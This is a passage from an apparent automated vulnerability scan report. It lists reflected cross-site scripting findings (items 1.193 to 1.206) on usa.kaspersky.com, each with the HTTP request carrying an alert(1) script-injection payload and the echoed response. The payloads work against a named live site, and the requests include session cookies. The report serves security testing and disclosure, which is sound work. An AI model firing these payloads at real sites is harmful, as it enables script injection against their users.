<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5771/lightbox2?d2ce1"><script>alert(1)</script>5d33dadea42=1" />
...[SNIP]...

1.193. http://usa.kaspersky.com/node/5772/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d56"-alert(1)-"96ba9f107b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node81d56"-alert(1)-"96ba9f107b9/5772/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687099"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:45:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node81d56"-alert(1)-"96ba9f107b9/5772/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.194. http://usa.kaspersky.com/node/5772/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd4a"><script>alert(1)</script>9b34ade08e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodebfd4a"><script>alert(1)</script>9b34ade08e2/5772/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687080"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:44:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodebfd4a"><script>alert(1)</script>9b34ade08e2/5772/lightbox2" />
...[SNIP]...

1.195. http://usa.kaspersky.com/node/5772/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9926"><script>alert(1)</script>d9f6ceb468 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5772f9926"><script>alert(1)</script>d9f6ceb468/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687202"
Content-Type: text/html; charset=utf-8
Content-Length: 29392
Date: Sat, 18 Dec 2010 15:46:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5772f9926"><script>alert(1)</script>d9f6ceb468/lightbox2" />
...[SNIP]...

1.196. http://usa.kaspersky.com/node/5772/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad75f"-alert(1)-"7a99ea2e2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5772ad75f"-alert(1)-"7a99ea2e2d0/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:47:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687222"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:47:20 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5772ad75f"-alert(1)-"7a99ea2e2d0/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.197. http://usa.kaspersky.com/node/5772/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b330"><script>alert(1)</script>c2255b0bd3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5772/lightbox21b330"><script>alert(1)</script>c2255b0bd3f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:49:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687395"
Content-Type: text/html; charset=utf-8
Content-Length: 28755
Date: Sat, 18 Dec 2010 15:50:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5772/lightbox21b330"><script>alert(1)</script>c2255b0bd3f" />
...[SNIP]...

1.198. http://usa.kaspersky.com/node/5772/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5772/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e95d"><script>alert(1)</script>31d27e092ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5772/lightbox2?7e95d"><script>alert(1)</script>31d27e092ae=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:42:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686953"
Content-Type: text/html; charset=utf-8
Content-Length: 13319
Date: Sat, 18 Dec 2010 15:42:42 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5772/lightbox2?7e95d"><script>alert(1)</script>31d27e092ae=1" />
...[SNIP]...

1.199. http://usa.kaspersky.com/node/5773 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5773

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9f95"><script>alert(1)</script>4066f2bd561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodeb9f95"><script>alert(1)</script>4066f2bd561/5773 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:50:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687449"
Content-Type: text/html; charset=utf-8
Content-Length: 30102
Date: Sat, 18 Dec 2010 15:50:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodeb9f95"><script>alert(1)</script>4066f2bd561/5773" />
...[SNIP]...

1.200. http://usa.kaspersky.com/node/5773 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5773

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7346"-alert(1)-"68218cd9609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodef7346"-alert(1)-"68218cd9609/5773 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687475"
Content-Type: text/html; charset=utf-8
Content-Length: 30005
Date: Sat, 18 Dec 2010 15:51:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodef7346"-alert(1)-"68218cd9609/5773";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.201. http://usa.kaspersky.com/node/5773 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5773

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1494"-alert(1)-"07b9011d6ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5773b1494"-alert(1)-"07b9011d6ed HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687606"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:53:34 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5773b1494"-alert(1)-"07b9011d6ed";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.202. http://usa.kaspersky.com/node/5773 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5773

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2dac"><script>alert(1)</script>b9aba540726 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5773d2dac"><script>alert(1)</script>b9aba540726 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687584"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:53:12 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5773d2dac"><script>alert(1)</script>b9aba540726" />
...[SNIP]...

1.203. http://usa.kaspersky.com/node/5783 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5783

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9e4"-alert(1)-"b0fc5bd425e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node4b9e4"-alert(1)-"b0fc5bd425e/5783 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687502"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:51:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node4b9e4"-alert(1)-"b0fc5bd425e/5783";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.204. http://usa.kaspersky.com/node/5783 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5783

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e5c9"><script>alert(1)</script>03d5bbb89f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node7e5c9"><script>alert(1)</script>03d5bbb89f3/5783 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687480"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:51:29 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node7e5c9"><script>alert(1)</script>03d5bbb89f3/5783" />
...[SNIP]...

1.205. http://usa.kaspersky.com/node/5783 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5783

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b313"><script>alert(1)</script>bc959c4ed7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/57831b313"><script>alert(1)</script>bc959c4ed7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687599"
Content-Type: text/html; charset=utf-8
Content-Length: 29332
Date: Sat, 18 Dec 2010 15:53:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/57831b313"><script>alert(1)</script>bc959c4ed7" />
...[SNIP]...

1.206. http://usa.kaspersky.com/node/5783 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5783

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c8c6"-alert(1)-"cba96d0e5ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57832c8c6"-alert(1)-"cba96d0e5ac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
